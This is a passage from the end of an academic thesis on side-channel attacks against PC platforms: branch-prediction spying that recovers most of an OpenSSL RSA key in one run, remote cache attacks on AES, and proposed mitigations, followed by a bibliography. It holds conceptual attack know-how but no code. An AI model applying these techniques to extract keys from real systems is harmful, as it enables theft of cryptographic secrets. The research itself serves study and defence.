On an average PC (client or server) running Windows, Linux, etc., there are many quasi-parallel processes running, whether system processes or user-initiated processes. The times when such processes are running can be assumed to be random, and they heavily influence the timing behavior of every other process, e.g., our spy and crypto process. Therefore, there is a statistical chance to perform some of our measurements during a timeframe when such influences are minimal, which leads us to the following heuristic: there must exist among all those measurements also some quite "clear" measurements. We call this argument the time-dependent random self-improvement heuristic. Applying this heuristic simply means that we just have to do some SBPA measurements, say at several independent times, and we can be sure that among those there will be at least "one unusually good" individual measurement, which will be our final SBPA. To validate this heuristic, we then performed ten different "random" SBPA attacks on the same 512-bit key. The results are given in Figure 8.3. Without doubt, there are quite different results among them although they process the same key, thus supporting our heuristic quite well. And indeed, the experimental result shown in Figure 8.4, also being among those ten measurements, clearly shows that there is one exceptionally clear measurement, which directly reveals almost all of the secret key bits. Armed with this final experimental result, we can safely claim that we have lifted our work of [7] to the much more powerful SBPA area.

FIGURE 8.3. Enhancing a bad resolution via independent repetition.

FIGURE 8.4. Best result of our SBPA against OpenSSL RSA, yielding 508 out of 512 secret key bits.

8.4. Conclusions

Branch Prediction Analysis (BPA), which recently led to a new software side-channel attack, still had the flavor of classical timing attacks against RSA. Timing attacks use many execution-time measurements under the same key in order to statistically amplify some small but key-dependent timing differences. We have dramatically improved our former results presented in [7, 1] and the previous chapter and showed that a carefully written spy-process running simultaneously with an RSA-process is able to collect almost all of the secret key bits during one single RSA signing execution.
We call this attack, analyzing the CPU's Branch Predictor states through spying on a single quasi-parallel computation process, a Simple Branch Prediction Analysis (SBPA) attack — sharply differentiating it from those relying on statistical methods and requiring many computation measurements under the same key. The successful extraction of almost all secret key bits by our SBPA attack against an OpenSSL RSA implementation proves that the often recommended blinding or so called randomization techniques to protect RSA against side-channel attacks are, in the context of SBPA attacks, totally useless. In addition to that very crucial security implication, targeted at such implementations which are assumed to be at least statistically secure, our successful SBPA attack also bears another equally critical security implication. Namely, in the context of simple side-channel attacks, it is widely believed that equally balancing the operations after branches is a secure countermeasure against such simple attacks. Unfortunately, this is not true, as even such "balanced branch" implementations can be completely broken by our SBPA attacks. Moreover, despite sophisticated hardware-assisted partitioning methods such as memory protection, sandboxing or even virtualization, SBPA attacks empower an unprivileged process to successfully attack other processes running in parallel on the same processor. Thus, we conclude that SBPA attacks are much more dangerous than previously anticipated, as they obviously do not belong to the same category as pure timing attacks. More importantly, since our new attack requires only one single execution observation, and thus significantly differs from the earlier timing attacks, the SBPA discovery opens new and very interesting application areas. It especially endangers those cryptographic/algorithmic primitives whose nature is an intrinsic and input dependent branching process. Here, we especially target the modular reduction and the modular inversion parts. In practical implementations of popular cryptosystems, they are often used in cases where one parameter of the respective algorithm (i.e., modular reduction or modular inversion) is an important secret parameter of the underlying cryptosystem. Let us briefly mention a few important situations for reduction and inversion where a successful SBPA attack can lead to a serious security compromise.

• Modular reduction (mod p and mod q) is used in the initial normalization process of RSA when using the Chinese Remainder Theorem, c.f. [64]. And indeed, [51, 53] already pointed out that the classical pencil and paper division algorithm could leak the secret knowledge of p and q through certain side channels.

• Inversion is also very often used as a statistical side channel attack countermeasure to blind messages during RSA signature computations, c.f. [59, 85], thus effectively combating classical timing attacks, c.f. [21].

• Inversion is the main ingredient during the RSA key generation set-up to compute the secret exponent from the public exponent and the totient function of the respective RSA modulus.

• Inversion is also used in the (EC)DSA, c.f. [64], and just the leakage of a few secret bits of the respective ephemeral keys, c.f. [47, 69, 70], leads to a total break of the (EC)DSA.
Classical timing attacks cannot compromise such operations, simply because they rely on capturing many measurements with the same input parameters and on statistical analysis, whereas the above situations execute the reduction or inversion part only once for a specific input set. We feel that our findings will eventually result in a serious revision of current software for various public-key cryptosystem implementations, and that a new research vector will arise along our results.

9. CONCLUSION

Side-channel cryptanalysis has attracted significant attention since Kocher’s discoveries of timing and power analysis attacks [59, 60]. Classical cryptography, which analyzes cryptosystems as perfect mathematical objects and ignores the physical analysis of their implementations, fails to identify side-channel leakages. Therefore, it is essential to employ both classical cryptography and side-channel cryptanalysis in order to develop and implement secure systems.

The initial focus of side-channel research was on smart card security. Smart cards are used for identification or financial transactions and therefore need built-in security features. They store secret values inside the card and are especially designed to protect and process these secret values. The recent promises from the Trusted Computing community indicate the security assurance of storing such secret values on PC platforms, c.f. [99]. These promises have made the side-channel analysis of PC platforms as desirable as that of smart cards.

We have seen an increased research effort on the security analysis of everyday PC platforms from the side-channel point of view. Here, it has been especially shown that the functionality of common processor components creates an indisputable security risk, c.f. [1, 2, 5, 14, 73, 80], which comes in different forms. Although the cache itself has long been known to be a crucial security risk of modern CPUs, c.f. [95, 48], the works [5, 14, 73, 80] were the first to demonstrate such vulnerabilities in practice and raised broad public interest in them. These advances initiated a new research vector to identify, analyze, and mitigate the security vulnerabilities that are created by the design and implementation of processor components.

Especially in the light of ongoing Trusted Computing efforts, c.f. [99], which promise to turn the commodity PC platform into a trustworthy platform, c.f. also [25, 35, 42, 79, 99, 103], the side-channel attacks against PC platforms described above have significant importance. This is due to the fact that side-channel attacks have so far been completely ignored by the Trusted Computing community. Even more interesting is the fact that all of the above pure-software side-channel attacks also allow a totally unprivileged process to attack other processes running in parallel on the same processor (or even remotely), despite sophisticated partitioning methods such as memory protection, sandboxing or even virtualization. This particularly means that side-channel attacks render the sophisticated protection mechanisms described, e.g., in [42, 103] useless. The simple reason for the failure of these trust mechanisms is that the new side-channel attacks exploit deeper processor ingredients that lie below the trust architecture boundary, c.f. [81, 42].

In this thesis, we have focused on side-channel cryptanalysis of cryptosystems on commodity computer platforms.
In particular, we have analyzed two main CPU components, the cache and the branch prediction unit, from the side-channel point of view. We have shown that the functionalities of these two components create very serious security risks in software systems, especially in software-based cryptosystems.

We have presented the first realistic remote timing attack on computer systems, which was developed by Brumley and Boneh [21], and proposed an improved version of this original attack. Our proposals improve the efficiency of this attack by a factor of more than 10.

Then we have presented the current cache attacks in the literature to give the reader a brief overview of the area. We have also introduced a new cache timing attack on AES that can compromise remote systems. None of the previous cache attack works had achieved the ultimate goal of devising a realistic remote attack. We have discussed how one can devise and apply such a remote cache attack. We have presented those ideas in Chapter 5 and showed how to use them to develop a universal remote cache attack on AES. Our results prove that cache attacks cannot be considered pure local attacks and that they can be applied to software systems running over a network.

We have also analyzed trace-driven cache attacks, which are one of the three types of cache attacks identified so far. We have constructed an analytical model for trace-driven attacks that enables one to analyze such attacks on different implementations and different platforms, c.f. Chapter 6. We have developed very efficient trace-driven attacks on AES and applied our model to those attacks as a case study.

Furthermore, we have identified the branch prediction units of modern computer systems as yet another unforeseen security risk, even in the presence of recent security promises for commodity platforms from the Trusted Computing area. We have developed various attack techniques that rely on the functionality of branch prediction units. We have shown that those attacks can practically extract the secrets of public-key cryptosystems. Moreover, we have shown that a carefully written spy process running simultaneously with an RSA process is able to collect, during one single RSA signing execution, almost all of the secret key bits.

We call this attack, which analyzes the CPU’s Branch Predictor states by spying on a single quasi-parallel computation process, a Simple Branch Prediction Analysis (SBPA) attack, sharply differentiating it from those attacks that rely on statistical methods and require many computation measurements under the same key. The successful extraction of almost all secret key bits by our SBPA attack against an OpenSSL RSA implementation proves that the often recommended blinding or so-called randomization techniques to protect RSA against side-channel attacks are, in the context of SBPA attacks, totally useless.

In addition to that very crucial security implication, targeted at implementations which are assumed to be at least statistically secure, our successful branch prediction attacks also bear another equally critical security implication. Namely, in the context of simple side-channel attacks, it is widely believed that equally balancing the operations after branches is a secure countermeasure against such simple attacks. Unfortunately, this is not true, as even such “balanced branch” implementations can be completely broken by our attacks.
Moreover, despite sophisticated hardware-assisted partitioning methods such as memory protection, sandboxing or even virtualization, SBPA attacks empower an unprivileged process to successfully attack other processes running in parallel on the same processor. Thus, we conclude that branch prediction attacks are extremely dangerous, as they obviously do not belong to the same category as pure timing attacks. More importantly, since our new attack requires only one single execution observation, and thus significantly differs from the earlier timing attacks, the SBPA discovery opens new and very interesting application areas. It especially endangers those cryptographic/algorithmic primitives whose nature is an intrinsic and input-dependent branching process. Here, we especially target the modular reduction and the modular inversion operations. In practical implementations of popular cryptosystems, they are often used in cases where one parameter of the respective algorithm (i.e., modular reduction or modular inversion) is an important secret parameter of the underlying cryptosystem.

The potential cache-based security vulnerabilities have been known for a long time, even though actual cache attacks were not implemented until recently. Many countermeasures had been proposed to prevent cache attacks even before 2005. However, there was no hint in the literature pointing out branch prediction as a potential side-channel attack source. As a consequence, there had been no effort to develop mitigation methods against branch prediction attacks. We have therefore developed several mitigations against this particular security vulnerability. Branch prediction attacks also compromise secure systems even in the presence of sophisticated partitioning techniques like memory protection and virtualization. Therefore, it is crucial to employ mitigation methods against the vulnerabilities we have identified in order to achieve the promises of security-critical technologies like virtualization.

We believe that our findings presented in this thesis will eventually result in a serious revision of current software for various cryptosystem implementations, and that new research vectors will arise along our results.

BIBLIOGRAPHY

[1] O. Acıiçmez, Ç. K. Koç, and J.-P. Seifert. Predicting Secret Keys via Branch Prediction. Topics in Cryptology — CT-RSA 2007, The Cryptographers’ Track at the RSA Conference 2007, M. Abe, editor, pages 225-242, Springer-Verlag, Lecture Notes in Computer Science series 4377, 2007.
[2] O. Acıiçmez, Ç. K. Koç, and J.-P. Seifert. On The Power of Simple Branch Prediction Analysis. Cryptology ePrint Archive, Report 2006/351, October 2006.
[3] O. Acıiçmez and Ç. K. Koç. Trace-Driven Cache Attacks on AES. Cryptology ePrint Archive, Report 2006/138, April 2006.
[4] O. Acıiçmez and Ç. K. Koç. Trace-Driven Cache Attacks on AES (Short Paper). 8th International Conference on Information and Communications Security — ICICS 2006, P. Ning, S. Qing, and N. Li, editors, pages 112-121, Springer-Verlag, Lecture Notes in Computer Science series 4307, 2006.
[5] O. Acıiçmez, W. Schindler, and Ç. K. Koç. Cache Based Remote Timing Attack on the AES. Topics in Cryptology — CT-RSA 2007, The Cryptographers’ Track at the RSA Conference 2007, M. Abe, editor, pages 271-286, Springer-Verlag, Lecture Notes in Computer Science series 4377, 2007.
[6] O. Acıiçmez, W. Schindler, and Ç. K. Koç. Improving Brumley and Boneh Timing Attack on Unprotected SSL Implementations.
Proceedings of the 12th ACM Conference on Computer and Communications Security, C. Meadows and P. Syverson, editors, pages 139-146, ACM Press, 2005.
[7] O. Acıiçmez, J.-P. Seifert, and Ç. K. Koç. Predicting Secret Keys via Branch Prediction. Cryptology ePrint Archive, Report 2006/288, August 2006.
[8] Advanced Encryption Standard (AES). Federal Information Processing Standards Publication 197, 2001. Available at: http://csrc.nist.gov/publications/fips/fips197/fips-197.pdf
[9] AES Lounge. http://www.iaik.tugraz.at/research/krypto/AES/
[10] D. Agrawal, B. Archambeault, J. R. Rao, and P. Rohatgi. The EM Side-Channel(s). Cryptographic Hardware and Embedded Systems — CHES 2002, B. S. Kaliski Jr., Ç. K. Koç, and C. Paar, editors, pages 29-45, Springer-Verlag, Lecture Notes in Computer Science series 2523, 2003.
[11] T. Austin, E. Larson, and D. Ernst. SimpleScalar: an infrastructure for computer system modeling. IEEE Computer, volume 35, issue 2, pages 59-67, February 2002.
[12] M. Bellare and P. Rogaway. Optimal asymmetric encryption — How to encrypt with RSA. Advances in Cryptology — EUROCRYPT ’94, pages 92-111, Springer-Verlag, Lecture Notes in Computer Science series 950, 1995.
[13] D. E. Bell and L. La Padula. Secure Computer Systems: Mathematical Foundations and Model. Technical Report M74-244, MITRE Corporation, 1973.
[14] D. J. Bernstein. Cache-timing attacks on AES. Technical Report, 37 pages, April 2005. Available at: http://cr.yp.to/antiforgery/cachetiming-20050414.pdf
[15] G. Bertoni, V. Zaccaria, L. Breveglieri, M. Monchiero, and G. Palermo. AES Power Attack Based on Induced Cache Miss and Countermeasure. International Symposium on Information Technology: Coding and Computing — ITCC 2005, volume 1, pages 4-6, 2005.
[16] D. Bleichenbacher. Chosen Ciphertext Attacks Against Protocols Based on the RSA Encryption Standard PKCS #1. Advances in Cryptology — CRYPTO ’98, H. Krawczyk, editor, pages 1-12, Springer-Verlag, Lecture Notes in Computer Science series 1462, 1998.
[17] D. Boneh. Twenty years of attacks on the RSA cryptosystem. Notices of the American Mathematical Society, volume 46, pages 203-213, 1999. Available at: http://www.ams.org/notices/199902/boneh.pdf
[18] J. Bonneau and I. Mironov. Cache-Collision Timing Attacks against AES. Cryptographic Hardware and Embedded Systems — CHES 2006, L. Goubin and M. Matsui, editors, pages 201-215, Springer-Verlag, Lecture Notes in Computer Science series 4249, 2006.
[19] E. Brickell, G. Graunke, M. Neve, and J.-P. Seifert. Software mitigations to hedge AES against cache-based software side channel vulnerabilities. Cryptology ePrint Archive, Report 2006/052, February 2006.
[20] R. H. Brown, M. L. Good, and A. Prabhakar. Data Encryption Standard (DES) (FIPS 46-2). Federal Information Processing Standards Publication (FIPS), December 1993 (initial version from January 15, 1977). Available at: http://www.itl.nist.gov/fipspubs/fip46-2.html
[21] D. Brumley and D. Boneh. Remote Timing Attacks are Practical. Proceedings of the 12th Usenix Security Symposium, pages 1-14, 2003.
[22] D. Burger, T. M. Austin, and S. Bennett. Evaluating future microprocessors: The SimpleScalar tool set. Technical Report CS-TR-1996-1308, 1996.
[23] B. Canvel, A. Hiltgen, S. Vaudenay, and M. Vuagnoux. Password Interception in a SSL/TLS Channel. Advances in Cryptology — CRYPTO ’03, D. Boneh, editor, pages 583-599, Springer-Verlag, Lecture Notes in Computer Science series 2729, 2003.
[24] S. Chari, J. R. Rao, and P. Rohatgi. Template Attacks. Cryptographic Hardware and Embedded Systems — CHES 2002, B. S.
Kaliski Jr., Ç. K. Koç, and C. Paar, editors, pages 13-28, Springer-Verlag, Lecture Notes in Computer Science series 2523, 2003.
[25] Y. Chen, P. England, M. Peinado, and B. Willman. High Assurance Computing on Open Hardware Architectures. Technical Report MSR-TR-2003-20, 17 pages, Microsoft Corporation, March 2003. Available at: ftp://ftp.research.microsoft.com/pub/tr/tr-2003-20.ps
[26] B. Chevallier-Mames, M. Ciet, and M. Joye. Low-cost solutions for preventing simple side-channel analysis: side-channel atomicity. IEEE Transactions on Computers, volume 53, issue 6, pages 760-768, June 2004.
[27] D. Coppersmith. Small Solutions to Polynomial Equations, and Low Exponent RSA Vulnerabilities. Journal of Cryptology, volume 10, issue 4, pages 233-260, 1997.
[28] J.-S. Coron, D. Naccache, and P. Kocher. Statistics and Secret Leakage. ACM Transactions on Embedded Computing Systems, volume 3, issue 3, pages 492-508, August 2004.
[29] S. C. Coutinho. The Mathematics of Ciphers: Number Theory and RSA Cryptography. AK Peters, 1998.
[30] Cryptographic Key Length Recommendation. Available at: http://www.keylength.com
[31] J. Daemen and V. Rijmen. The Design of Rijndael: AES — The Advanced Encryption Standard. Springer-Verlag, 2002.
[32] Department of Defense. Trusted Computer System Evaluation Criteria (Orange Book). DoD 5200.28-STD, 1985.
[33] R. C. Detmer. Introduction to 80X86 Assembly Language and Computer Architecture. Jones & Bartlett Publishers, 2001.
[34] J.-F. Dhem, F. Koeune, P.-A. Leroux, P.-A. Mestré, J.-J. Quisquater, and J.-L. Willems. A Practical Implementation of the Timing Attack. Smart Card Research and Applications, J.-J. Quisquater and B. Schneier, editors, pages 175-191, Springer-Verlag, Lecture Notes in Computer Science series 1820, 2000.
[35] P. England, B. Lampson, J. Manferdelli, M. Peinado, and B. Willman. A Trusted Open Platform. IEEE Computer, volume 36, issue 7, pages 55-62, July 2003.
[36] W. Feller. Introduction to Probability Theory and Its Applications (Volume 1). 3rd edition, revised printing, New York, Wiley, 1970.
[37] K. Gandolfi, C. Mourtel, and F. Olivier. Electromagnetic Analysis: Concrete Results. Cryptographic Hardware and Embedded Systems — CHES 2001, Ç. K. Koç, D. Naccache, and C. Paar, editors, pages 251-261, Springer-Verlag, Lecture Notes in Computer Science series 2162, 2001.
[38] P. Gänssler and W. Stute. Wahrscheinlichkeitstheorie. Springer, Berlin, 1977.
[39] P. Genua. A Cache Primer. Technical Report, Freescale Semiconductor Inc., 16 pages, 2004. Available at: http://www.freescale.com/files/32bit/doc/app_note/AN2663.pdf
[40] GNU Project: GMP. http://www.swox.com/gmp/
[41] S. Gochman, R. Ronen, I. Anati, A. Berkovits, T. Kurts, A. Naveh, A. Saeed, Z. Sperber, and R. Valentine. The Intel Pentium M Processor: Microarchitecture and performance. Intel Technology Journal, volume 7, issue 2, May 2003.
[42] D. Grawrock. The Intel Safer Computing Initiative: Building Blocks for Trusted Computing. Intel Press, 2006.
[43] J. Handy. The Cache Memory Book. 2nd edition, Morgan Kaufmann, 1998.
[44] A. Hevia and M. Kiwi. Strength of Two Data Encryption Standard Implementations under Timing Attacks. ACM Transactions on Information and System Security — TISSEC, volume 4, issue 2, pages 416-437, November 1999.
[45] F. H. Hinsley and A. Stripp. Code Breakers. Oxford University Press, 1993.
[46] History of Computer Security Project: Early Papers. National Institute of Standards and Technology (NIST), Computer Security Division: Computer Security Resource Center.
Available at: http://csrc.nist.gov/publications/history/index.html
[47] N. A. Howgrave-Graham and N. P. Smart. Lattice Attacks on Digital Signature Schemes. Designs, Codes and Cryptography, volume 23, pages 283-290, 2001.
[48] W. M. Hu. Lattice scheduling and covert channels. Proceedings of the IEEE Symposium on Security and Privacy, pages 52-61, IEEE Computer Society, 1992.
[49] M. Joye and P. Paillier. How to Use RSA; or How to Improve the Efficiency of RSA without Loosing its Security. ISSE 2002, U. Schulte, editor, Paris, France, October 2-4, 2002.
[50] M. Joye, J.-J. Quisquater, and T. Takagi. How to Choose Secret Parameters for RSA-Type Cryptosystems over Elliptic Curves. Designs, Codes and Cryptography, volume 23, issue 3, pages 297-316, 2001.
[51] M. Joye and K. Villegas. A protected division algorithm. Smart Card Research and Advanced Applications — CARDIS 2002, P. Honeyman, editor, pages 69-74, Usenix Association, 2002.
[52] M. Joye and S.-M. Yen. The Montgomery powering ladder. Cryptographic Hardware and Embedded Systems — CHES 2002, B. S. Kaliski Jr., Ç. K. Koç, and C. Paar, editors, pages 291-302, Springer-Verlag, Lecture Notes in Computer Science series 2523, 2003.
[53] H. Kahl. SPA-based attack against the modular reduction within a partially secured RSA-CRT implementation. Cryptology ePrint Archive, Report 2004/197, 2004.
[54] J. Kelsey, B. Schneier, D. Wagner, and C. Hall. Side Channel Cryptanalysis of Product Ciphers. Journal of Computer Security, volume 8, pages 141-158, 2000.
[55] N. S. Kim, T. Austin, T. Mudge, and D. Grunwald. Challenges for architectural level power modeling. Power-Aware Computing, R. Melhem and R. Graybill, editors, 2001.
[56] N. Koblitz. A Course in Number Theory and Cryptography (Graduate Texts in Mathematics). Springer, 1994.
[57] Ç. K. Koç. High-Speed RSA Implementation. TR 201, RSA Laboratories, 73 pages, November 1994.
[58] Ç. K. Koç. RSA Hardware Implementation. TR 801, RSA Laboratories, 30 pages, April 1996.
[59] P. C. Kocher. Timing Attacks on Implementations of Diffie-Hellman, RSA, DSS, and Other Systems. Advances in Cryptology — CRYPTO ’96, N. Koblitz, editor, pages 104-113, Springer-Verlag, Lecture Notes in Computer Science series 1109, 1996.
[60] P. C. Kocher, J. Jaffe, and B. Jun. Differential Power Analysis. Advances in Cryptology — CRYPTO ’99, M. Wiener, editor, pages 388-397, Springer-Verlag, Lecture Notes in Computer Science series 1666, 1999.
[61] F. Koeune and J.-J. Quisquater. A Timing Attack against Rijndael. Technical Report CG-1999/1, June 1999.
[62] C. Lauradoux. Collision attacks on processors with cache and countermeasures. Western European Workshop on Research in Cryptology — WEWoRC 2005, C. Wolf, S. Lucks, and P.-W. Yau, editors, pages 76-85, 2005.
[63] M. Matsui. New Block Encryption Algorithm MISTY. Proceedings of the 4th International Workshop on Fast Software Encryption, G. Goos, J. Hartmanis, and J. van Leeuwen, editors, pages 54-68, Springer-Verlag, Lecture Notes in Computer Science series 1267, 1997.
[64] A. J. Menezes, P. van Oorschot, and S. Vanstone. Handbook of Applied Cryptography. CRC Press, New York, 1997.
[65] M. Milenkovic, A. Milenkovic, and J. Kulick. Microbenchmarks for Determining Branch Predictor Organization. Software Practice & Experience, volume 34, issue 5, pages 465-487, April 2004.
[66] M. Neve. Cache-based Vulnerabilities and SPAM Analysis. Ph.D. Thesis, Applied Science, UCL, July 2006.
[67] M. Neve and J.-P. Seifert. Advances on Access-driven Cache Attacks on AES.
Selected Areas in Cryptography — SAC 2006, to appear.
[68] M. Neve, J.-P. Seifert, and Z. Wang. A refined look at Bernstein’s AES side-channel analysis. Proceedings of the ACM Symposium on Information, Computer and Communications Security — ASIACCS 2006, to appear, Taipei, Taiwan, March 21-24, 2006.
[69] P. Q. Nguyen and I. E. Shparlinski. The Insecurity of the Digital Signature Algorithm with Partially Known Nonces. Journal of Cryptology, volume 15, issue 3, pages 151-176, Springer, 2002.
[70] P. Q. Nguyen and I. E. Shparlinski. The Insecurity of the Elliptic Curve Digital Signature Algorithm with Partially Known Nonces. Designs, Codes and Cryptography, volume 30, pages 201-217, 2003.
[71] OpenSSL: the open-source toolkit for SSL/TLS. Available at: http://www.openssl.org/
[72] D. A. Osvik, A. Shamir, and E. Tromer. Other People’s Cache: Hyper Attacks on HyperThreaded Processors. Presentation available at: http://www.wisdom.weizmann.ac.il/~tromer/
[73] D. A. Osvik, A. Shamir, and E. Tromer. Cache Attacks and Countermeasures: The Case of AES. Topics in Cryptology — CT-RSA 2006, The Cryptographers’ Track at the RSA Conference 2006, D. Pointcheval, editor, pages 1-20, Springer-Verlag, Lecture Notes in Computer Science series 3860, 2006.
[74] R. van der Pas. Memory Hierarchy in Cache-Based Systems. Technical Report, Sun Microsystems Inc., 28 pages, 2002. Available at: http://www.sun.com/blueprints/1102/817-0742.pdf
[75] D. Page. Theoretical Use of Cache Memory as a Cryptanalytic Side-Channel. Technical Report CSTR-02-003, Department of Computer Science, University of Bristol, June 2002.
[76] D. Page. Defending Against Cache Based Side-Channel Attacks. Technical Report, Department of Computer Science, University of Bristol, 2003.
[77] D. Page. Partitioned Cache Architecture as a Side Channel Defence Mechanism. Cryptology ePrint Archive, Report 2005/280, August 2005.
[78] D. Patterson and J. Hennessy. Computer Architecture: A Quantitative Approach. 4th edition, Morgan Kaufmann, 2006.
[79] S. Pearson. Trusted Computing Platforms: TCPA Technology in Context. Prentice Hall PTR, 2002.
[80] C. Percival. Cache missing for fun and profit. BSDCan 2005, Ottawa, 2005. Available at: http://www.daemonology.net/hyperthreading-considered-harmful/
[81] C. P. Pfleeger and S. L. Pfleeger. Security in Computing. 3rd edition, Prentice Hall PTR, 2002.
[82] R. L. Rivest, A. Shamir, and L. M. Adleman. A Method for Obtaining Digital Signatures and Public-Key Cryptosystems. Communications of the ACM, volume 21, pages 120-126, 1978.
[83] E. Rotenberg, S. Bennett, and J. E. Smith. Trace cache: a low latency approach to high bandwidth instruction fetching. Proceedings of the 29th Annual ACM/IEEE International Symposium on Microarchitecture, pages 24-34, 1996.
[84] RSA Laboratories. PKCS #1 v2.1: RSA Encryption Standard. June 2002. Available at: ftp://ftp.rsasecurity.com/pub/pkcs/pkcs-1/pkcs-1v2-1.pdf
[85] W. Schindler. A Timing Attack against RSA with the Chinese Remainder Theorem. Cryptographic Hardware and Embedded Systems — CHES 2000, Ç. K. Koç and C. Paar, editors, pages 110-125, Springer-Verlag, Lecture Notes in Computer Science series 1965, 2000.
[86] W. Schindler. Optimized Timing Attacks against Public Key Cryptosystems. Statistics and Decisions, volume 20, pages 191-210, 2002.
[87] W. Schindler. On the Optimization of Side-Channel Attacks by Advanced Stochastic Methods. Public Key Cryptography — PKC 2005, S. Vaudenay, editor, pages 85-103, Springer-Verlag, Lecture Notes in Computer Science series 3386, 2005.
[88] W. Schindler, F.
Koeune, and J.-J. Quisquater. Improving Divide and Conquer Attacks Against Cryptosystems by Better Error Detection/Correction Strategies. Cryptography and Coding — IMA 2001, B. Honary, editor, pages 245-267, Springer-Verlag, Lecture Notes in Computer Science series 2260, 2001.
[89] W. Schindler, F. Koeune, and J.-J. Quisquater. Unleashing the Full Power of Timing Attack. Technical Report CG-2001/3, Université Catholique de Louvain, 2001.
[90] B. Schneier. Applied Cryptography: Protocols, Algorithms, and Source Code in C. John Wiley & Sons, 1996.
[91] T. Shanley. The Unabridged Pentium 4: IA32 Processor Genealogy. Addison-Wesley Professional, 2004.
[92] J. Shen and M. Lipasti. Modern Processor Design: Fundamentals of Superscalar Processors. McGraw-Hill, 2005.
[93] A. Silberschatz, G. Gagne, and P. B. Galvin. Operating System Concepts. 7th edition, John Wiley and Sons, 2005.
[94] S. W. Smith. Trusted Computing Platforms: Design and Applications. Springer-Verlag, 2004.
[95] O. Sibert, P. A. Porras, and R. Lindell. The Intel 80x86 Processor Architecture: Pitfalls for Secure Systems. IEEE Symposium on Security and Privacy, pages 211-223, 1995.
[96] W. Stallings. Cryptography and Network Security: Principles and Practice. 3rd edition, Prentice Hall, 2002.
[97] D. R. Stinson. Cryptography: Theory and Practice. 2nd edition, CRC Press, 2002.
[98] H. C. A. van Tilborg. Encyclopedia of Cryptography and Security. Springer, 2005.
[99] Trusted Computing Group. http://www.trustedcomputinggroup.org
[100] Y. Tsunoo, T. Saito, T. Suzaki, M. Shigeri, and H. Miyauchi. Cryptanalysis of DES Implemented on Computers with Cache. Cryptographic Hardware and Embedded Systems — CHES 2003, C. D. Walter, Ç. K. Koç, and C. Paar, editors, pages 62-76, Springer-Verlag, Lecture Notes in Computer Science series 2779, 2003.
[101] Y. Tsunoo, E. Tsujihara, K. Minematsu, and H. Miyauchi. Cryptanalysis of Block Ciphers Implemented on Computers with Cache. ISITA 2002, 2002.
[102] Y. Tsunoo, E. Tsujihara, M. Shigeri, H. Kubo, and K. Minematsu. Improving cache attacks by considering cipher structure. International Journal of Information Security, volume 5, issue 3, pages 166-176, Springer-Verlag, 2006.
[103] R. Uhlig, G. Neiger, D. Rodgers, A. L. Santoni, F. C. M. Martins, A. V. Anderson, S. M. Bennett, A. Kagi, F. H. Leung, and L. Smith. Intel Virtualization Technology. IEEE Computer, volume 38, issue 5, pages 48-56, May 2005.
[104] S. Vaudenay. A Classical Introduction to Cryptography: Applications for Communications Security. Springer, 2005.
[105] C. D. Walter. Montgomery Exponentiation Needs No Final Subtractions. IEE Electronics Letters, volume 35, issue 21, pages 1831-1832, October 1999.
[106] W. Ware. Security Controls for Computer Systems. Report of Defense Science Board Task Force on Computer Security, Rand Report R609-1, The RAND Corporation, 1970.